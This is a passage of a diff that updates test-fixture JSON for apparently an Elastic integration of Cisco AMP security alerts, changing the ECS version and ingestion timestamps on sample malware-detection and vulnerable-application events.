Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1541,7 +1541,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1569,7 +1569,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469643984Z",
+                "ingested": "2021-09-13T18:06:41.546116850Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1629,7 +1629,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1649,7 +1649,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:04.469646010Z",
+                "ingested": "2021-09-13T18:06:41.546119034Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:22:29.000Z",
@@ -1710,7 +1710,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1742,7 +1742,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469647897Z",
+                "ingested": "2021-09-13T18:06:41.546121122Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1799,7 +1799,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1827,7 +1827,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469649781Z",
+                "ingested": "2021-09-13T18:06:41.546123192Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1884,7 +1884,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1912,7 +1912,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469651657Z",
+                "ingested": "2021-09-13T18:06:41.546125243Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1969,7 +1969,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2001,7 +2001,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469653537Z",
+                "ingested": "2021-09-13T18:06:41.546127347Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2058,7 +2058,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2090,7 +2090,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469655428Z",
+                "ingested": "2021-09-13T18:06:41.546129388Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2147,7 +2147,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2175,7 +2175,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469657309Z",
+                "ingested": "2021-09-13T18:06:41.546131467Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2232,7 +2232,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2260,7 +2260,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469659269Z",
+                "ingested": "2021-09-13T18:06:41.546133663Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2319,7 +2319,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2339,7 +2339,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:31:04.469661163Z",
+                "ingested": "2021-09-13T18:06:41.546135710Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:20:00.000Z",
@@ -2410,7 +2410,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2442,7 +2442,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469663071Z",
+                "ingested": "2021-09-13T18:06:41.546137800Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2499,7 +2499,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2527,7 +2527,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469664950Z",
+                "ingested": "2021-09-13T18:06:41.546139831Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2584,7 +2584,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2612,7 +2612,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469666839Z",
+                "ingested": "2021-09-13T18:06:41.546141890Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2669,7 +2669,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2701,7 +2701,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469668742Z",
+                "ingested": "2021-09-13T18:06:41.546143930Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat 